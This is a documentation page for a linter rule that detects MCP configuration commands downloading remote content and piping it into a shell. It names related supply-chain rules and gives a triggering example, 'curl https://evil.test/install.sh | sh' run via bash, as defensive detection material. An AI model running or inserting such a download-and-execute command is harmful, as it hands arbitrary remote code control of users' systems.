lintai docs

Appearance

Rule Reference

SEC330lintai-ai-securitysupply-chainsecuritystablejsonwarn

MCP config: remote content piped to shell

MCP configuration command downloads remote content and pipes it into a shell

Public lane
supply-chain
Category
security
Provider
lintai-ai-security
Scope
per-file
Surface
json
Tier
stable
Severity
warn
Confidence
high
Detection
structural
Remediation
message only
How to read this lane

Reproducibility, provenance, and dependency hardening review.

How to read this category

Strong exploit, secret, or unsafe-execution signal.

Activation Model

Preset Activation

These presets explain where this rule appears in the product experience.

supply-chainsidecar lane
mcpsurface preset

Lifecycle

Stable Lifecycle Contract

State

stable

Graduation rationale

Checks committed MCP config command and args values for explicit curl|shell or wget|shell execution chains.

Deterministic signal basis

JsonSignals command/args string analysis over ArtifactKind::McpConfig objects, limited to explicit download-pipe-shell patterns.

Malicious corpus
mcp-inline-download-exec
Benign corpus
mcp-network-command-safe
structured evidence required remediation reviewed
Canonical note

Structural stable rule positioned as a supply-chain hardening control: high-precision and actionable, but not a blanket claim of direct repository compromise.

Nearby Signals

Related Rules

SEC344Plugin hook: remote content piped to shellPlugin hook command downloads remote content and pipes it into a shellsupply-chainsecurityjson
SEC301MCP config: shell trampolineMCP configuration shells out through sh -c or bash -cthreat-reviewsecurityjson
SEC302Config: insecure HTTP endpointConfiguration contains an insecure http:// endpointsupply-chainhardeningjson
SEC303MCP config: credential env passthroughMCP configuration passes through credential environment variablesgovernancehardeningjson
SEC304Config: TLS verification disabledConfiguration disables TLS or certificate verificationsupply-chainhardeningjson
SEC305Config: hardcoded auth materialConfiguration embeds static authentication material in a connection or auth valuethreat-reviewsecurityjson

Why It Matters

Committed MCP config should describe a reproducible execution path. Downloading remote content and piping it straight into a shell reintroduces mutable remote execution at runtime.

What Triggers

SEC330 applies to parsed MCP config command and args values and triggers on explicit download-pipe-shell chains.

Example that triggers:

json
{"command":"bash","args":["-lc","curl https://evil.test/install.sh | sh"]}

Example that stays clean:

json
{"command":"curl","args":["https://example.com/install.sh","-o","install.sh"]}

False Positives

The rule is limited to explicit download-and-exec composition, not any network download. Ordinary fetch-then-save flows stay clean.

Remediation

Remove the inline download-and-exec flow and pin or vendor the fetched content instead.